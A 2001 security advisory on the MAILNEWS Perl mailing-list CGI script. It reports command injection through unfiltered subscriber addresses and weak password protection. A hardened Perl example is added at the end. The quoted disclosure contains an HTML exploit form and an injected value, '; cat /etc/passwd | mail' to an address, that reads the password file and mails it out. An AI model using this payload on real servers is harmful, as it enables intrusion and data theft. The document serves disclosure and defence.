Mailnews Cgi Script May Execute Arbitrary Shell Commands Supplied By Unauthorized Users Via the Network
SecurityTracker Alert ID: 1000949
SecurityTracker URL: http://securitytracker.com/id/1000949
Updated: Feb 28 2001
Original Entry Date: Feb 21 2001
Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Version(s): 1.1, 1.3
The cgi-based MAILNEWS mailing list management software reportedly contains several vulnerabilities that allow an attacker to remotely supply shell commands to be executed by the cgi script.
Potentially the most serious vulnerability is that the software fails to appropriately filter certain input parameters. This allows an attacker to supply arbitrary shell commands that the cgi script will then execute. In addition, the script does not properly protect and enforce passwords, so an unauthorized user without knowledge of the administrative password can add or delete users from an affected maillist.
The original message contains demonstration exploit code.
An attacker can remotely provide shell commands to be executed by the cgi script with the privileges of the cgi script.
No solution was available at the time of this entry.
Vendor URL: www.creuter.lu/programming/perl/index.asp
Authentication error, Input validation error
Underlying OS: Linux (Any), Apple (Legacy "classic" Mac), UNIX (Any), Windows (Any)
Underlying OS Comments: Vulnerable target is a Perl script
Source Message Contents
Subject: CGI - mailnews.cgi vulnerability...
<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
##Tested Version: 1.1, 1.3
The author doesn't parse some characters and he uses a very stupid "password
protection". We can add or delete users from the maillist without knowing the
admin password. But this is a small problem ;] . Let's see what we can do
open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
where $mailprog [default] is sendmail and $member is users from usersfile.
Now we can do something like this. Add user "; cat /etc/passwd | mail
email@example.com' and use subroutine to execute this code :]
Simple exploit in html:
<INPUT type=hidden NAME="action" value="subscribe">
User to add with ; [ex:" ; cat /etc/passwd |mail firstname.lastname@example.org"
without quotes of course ]<INPUT NAME="address" TYPE="TEXT">
<INPUT TYPE="SUBMIT" VALUE="Submit">
Execute command :] </A>
<CENTER> Peace... </CENTER>
Who : Kanedaaa
***$$$### " And maybe a great many will not understand these words...
But there is no mercy for SONS OF BITCHES .... " ###$$*
email@example.com Hero ... Boss ... Abuser ... Cucumber Team Member... Bzz..
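
The piped open quoted in the source message passes "$mailprog $member" to the shell as a single string. The Perl below is an added example, not code from the advisory or from the MAILNEWS script, showing that pattern next to a hardened form; the sendmail path, the helper names valid_address and send_to_member, and the mailer accepting "--" are assumptions.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed sendmail path; the original script keeps this in $mailprog.
my $mailprog = '/usr/sbin/sendmail';

# Vulnerable pattern quoted in the message: the one-string form hands
# "$mailprog $member" to /bin/sh, so shell metacharacters in $member run.
#   open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";

# Hypothetical helper: accept only a conservative address shape.
# No whitespace, no shell metacharacters, no leading '-' (option injection).
# \A and \z anchor the whole string, so a trailing newline is rejected too.
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9][A-Za-z0-9._+-]*\@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/ ? 1 : 0;
}

# Hypothetical replacement for the piped open: list form, no shell involved.
sub send_to_member {
    my ($member, $body) = @_;
    die "rejected address\n" unless valid_address($member);
    # '|-' with a list execs $mailprog directly; '--' ends option parsing.
    open(my $mail, '|-', $mailprog, '-oi', '--', $member)
        or die "Can't run $mailprog: $!\n";
    print {$mail} $body;
    close($mail) or die "$mailprog exited with status $?\n";
    return 1;
}

# Constructed sample inputs; only the validator runs here, no mail is sent.
for my $candidate ('user@example.org',
                   '; cat /etc/passwd | mail user@example.org',
                   '-v@example.org',
                   "user\@example.org\n") {
    (my $shown = $candidate) =~ s/\n/\\n/g;
    printf "%-45s %s\n", $shown, valid_address($candidate) ? 'accept' : 'reject';
}
```

Validation and the list-form open are independent layers: the list form alone removes the shell, while the validator also keeps malformed entries out of the users file at subscribe time.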